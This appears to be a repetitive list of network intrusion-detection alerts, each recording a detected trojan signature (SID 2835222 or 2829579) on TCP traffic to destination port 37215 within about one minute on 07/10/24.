                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.836090
                  SID:2835222
                  Source Port:40794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.003131
                  SID:2835222
                  Source Port:36922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.472766
                  SID:2835222
                  Source Port:33378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853796
                  SID:2835222
                  Source Port:47080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.817860
                  SID:2835222
                  Source Port:48322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.818731
                  SID:2829579
                  Source Port:52072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.658407
                  SID:2829579
                  Source Port:37788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.898333
                  SID:2829579
                  Source Port:53778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078951
                  SID:2829579
                  Source Port:53800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.950899
                  SID:2835222
                  Source Port:35874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.053236
                  SID:2829579
                  Source Port:44930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790374
                  SID:2835222
                  Source Port:42452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222515
                  SID:2835222
                  Source Port:38744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.142714
                  SID:2829579
                  Source Port:43142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.577459
                  SID:2835222
                  Source Port:57602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.968527
                  SID:2835222
                  Source Port:42270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.406016
                  SID:2835222
                  Source Port:59180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098304
                  SID:2835222
                  Source Port:56140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.294435
                  SID:2835222
                  Source Port:38548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.945204
                  SID:2829579
                  Source Port:44556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822867
                  SID:2829579
                  Source Port:48124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.567631
                  SID:2829579
                  Source Port:48626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.619988
                  SID:2835222
                  Source Port:53920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.565038
                  SID:2829579
                  Source Port:40158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.518059
                  SID:2835222
                  Source Port:38652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.832527
                  SID:2835222
                  Source Port:57758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.849597
                  SID:2835222
                  Source Port:36590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.603089
                  SID:2829579
                  Source Port:56882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.326825
                  SID:2829579
                  Source Port:44552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815716
                  SID:2829579
                  Source Port:58342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.180841
                  SID:2835222
                  Source Port:57716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.856390
                  SID:2835222
                  Source Port:46860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.831148
                  SID:2829579
                  Source Port:33200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2829579
                  Source Port:37946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.822276
                  SID:2829579
                  Source Port:37354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302705
                  SID:2835222
                  Source Port:42156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.141072
                  SID:2829579
                  Source Port:33956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.249834
                  SID:2835222
                  Source Port:58204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156857
                  SID:2829579
                  Source Port:56356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2829579
                  Source Port:42378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571545
                  SID:2835222
                  Source Port:42932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985576
                  SID:2829579
                  Source Port:57714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.532227
                  SID:2835222
                  Source Port:36046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.438219
                  SID:2829579
                  Source Port:45854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.031000
                  SID:2835222
                  Source Port:36706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.096875
                  SID:2835222
                  Source Port:32922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.374424
                  SID:2835222
                  Source Port:37576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.522484
                  SID:2835222
                  Source Port:51182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.501102
                  SID:2829579
                  Source Port:51248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853390
                  SID:2835222
                  Source Port:50586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.475226
                  SID:2835222
                  Source Port:34170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603231
                  SID:2829579
                  Source Port:40224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.534689
                  SID:2835222
                  Source Port:44050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.139248
                  SID:2829579
                  Source Port:50614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.835893
                  SID:2829579
                  Source Port:57108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.062166
                  SID:2835222
                  Source Port:52142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.165581
                  SID:2829579
                  Source Port:51136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058367
                  SID:2835222
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593962
                  SID:2829579
                  Source Port:44380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.342086
                  SID:2835222
                  Source Port:56678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841336
                  SID:2829579
                  Source Port:55954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.883274
                  SID:2829579
                  Source Port:48710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.668696
                  SID:2835222
                  Source Port:56854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.536872
                  SID:2835222
                  Source Port:40990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.555583
                  SID:2835222
                  Source Port:49484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.805912
                  SID:2829579
                  Source Port:38992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278006
                  SID:2829579
                  Source Port:53054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.579889
                  SID:2829579
                  Source Port:40558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.664238
                  SID:2835222
                  Source Port:55952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.486385
                  SID:2835222
                  Source Port:49426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.865675
                  SID:2829579
                  Source Port:45478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.015608
                  SID:2829579
                  Source Port:57702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.122105
                  SID:2835222
                  Source Port:46812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187886
                  SID:2829579
                  Source Port:38540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2835222
                  Source Port:35282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.179402
                  SID:2829579
                  Source Port:47214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.523000
                  SID:2835222
                  Source Port:50306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2835222
                  Source Port:45212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.364667
                  SID:2835222
                  Source Port:59714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2835222
                  Source Port:59354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.374424
                  SID:2835222
                  Source Port:49256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.784447
                  SID:2829579
                  Source Port:35554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.591904
                  SID:2829579
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.044130
                  SID:2829579
                  Source Port:58524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.414315
                  SID:2829579
                  Source Port:52756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.593269
                  SID:2835222
                  Source Port:33968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.207686
                  SID:2835222
                  Source Port:58418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.446454
                  SID:2829579
                  Source Port:39754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.758583
                  SID:2829579
                  Source Port:32842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.503174
                  SID:2835222
                  Source Port:59100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.661405
                  SID:2829579
                  Source Port:34354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211996
                  SID:2829579
                  Source Port:58952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.515269
                  SID:2835222
                  Source Port:46136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595154
                  SID:2835222
                  Source Port:40464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850694
                  SID:2829579
                  Source Port:35664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.675135
                  SID:2835222
                  Source Port:38398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.396531
                  SID:2835222
                  Source Port:54318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.550214
                  SID:2829579
                  Source Port:42380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822486
                  SID:2835222
                  Source Port:40610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.817367
                  SID:2835222
                  Source Port:43866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.336405
                  SID:2829579
                  Source Port:49646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037621
                  SID:2835222
                  Source Port:55428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.353904
                  SID:2829579
                  Source Port:53330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.835499
                  SID:2835222
                  Source Port:45038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.560265
                  SID:2835222
                  Source Port:44038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881228
                  SID:2829579
                  Source Port:42804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.500582
                  SID:2829579
                  Source Port:50240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.474983
                  SID:2829579
                  Source Port:34852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.670364
                  SID:2829579
                  Source Port:57656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871389
                  SID:2829579
                  Source Port:38088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.455545
                  SID:2829579
                  Source Port:57702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623254
                  SID:2835222
                  Source Port:34566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.085141
                  SID:2835222
                  Source Port:48500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871389
                  SID:2829579
                  Source Port:47192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.401175
                  SID:2829579
                  Source Port:53666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.879703
                  SID:2835222
                  Source Port:48960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505029
                  SID:2829579
                  Source Port:32988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985938
                  SID:2835222
                  Source Port:33478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.167079
                  SID:2835222
                  Source Port:42728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.113927
                  SID:2829579
                  Source Port:38756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2829579
                  Source Port:41726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868955
                  SID:2829579
                  Source Port:35956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356986
                  SID:2829579
                  Source Port:58520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.875965
                  SID:2829579
                  Source Port:35046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218998
                  SID:2829579
                  Source Port:39362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196006
                  SID:2835222
                  Source Port:45538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344652
                  SID:2835222
                  Source Port:55628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.514875
                  SID:2835222
                  Source Port:45642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.077819
                  SID:2835222
                  Source Port:48066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.100122
                  SID:2829579
                  Source Port:44706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.860870
                  SID:2829579
                  Source Port:50146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.144985
                  SID:2829579
                  Source Port:55466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.180841
                  SID:2829579
                  Source Port:36292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2829579
                  Source Port:54160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.380057
                  SID:2835222
                  Source Port:54746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.788826
                  SID:2835222
                  Source Port:47810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.797142
                  SID:2829579
                  Source Port:44072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996643
                  SID:2835222
                  Source Port:33592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.019463
                  SID:2835222
                  Source Port:55274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.453748
                  SID:2829579
                  Source Port:34730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162130
                  SID:2835222
                  Source Port:53498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.091176
                  SID:2829579
                  Source Port:47316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:29.339499
                  SID:2835222
                  Source Port:42636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.656574
                  SID:2829579
                  Source Port:52516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.952819
                  SID:2829579
                  Source Port:40684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.522185
                  SID:2835222
                  Source Port:43010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.070289
                  SID:2829579
                  Source Port:41616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.648559
                  SID:2835222
                  Source Port:54176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.527707
                  SID:2835222
                  Source Port:58252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.460068
                  SID:2835222
                  Source Port:49436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.982789
                  SID:2829579
                  Source Port:40980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.023576
                  SID:2829579
                  Source Port:42082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156196
                  SID:2835222
                  Source Port:41276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431557
                  SID:2829579
                  Source Port:43326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2829579
                  Source Port:56232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.663550
                  SID:2829579
                  Source Port:50632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.636045
                  SID:2835222
                  Source Port:35444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.135196
                  SID:2835222
                  Source Port:39902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.662577
                  SID:2829579
                  Source Port:50622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.833668
                  SID:2835222
                  Source Port:36998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.354266
                  SID:2835222
                  Source Port:36486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.856505
                  SID:2835222
                  Source Port:51686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562651
                  SID:2829579
                  Source Port:41556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.119674
                  SID:2829579
                  Source Port:46644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.873302
                  SID:2835222
                  Source Port:32956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.401742
                  SID:2829579
                  Source Port:53214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.547260
                  SID:2835222
                  Source Port:39856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.440883
                  SID:2835222
                  Source Port:50142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.866134
                  SID:2829579
                  Source Port:50244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.406013
                  SID:2829579
                  Source Port:40380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842952
                  SID:2835222
                  Source Port:57532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.841867
                  SID:2829579
                  Source Port:41476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.862875
                  SID:2829579
                  Source Port:37682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.228923
                  SID:2829579
                  Source Port:56266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.457969
                  SID:2829579
                  Source Port:38834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.882640
                  SID:2835222
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839655
                  SID:2829579
                  Source Port:58210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603771
                  SID:2829579
                  Source Port:51228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260349
                  SID:2829579
                  Source Port:42324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.320673
                  SID:2835222
                  Source Port:46030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.065687
                  SID:2829579
                  Source Port:33106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875124
                  SID:2835222
                  Source Port:45544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126957
                  SID:2829579
                  Source Port:38804
                  Destination Port:37215
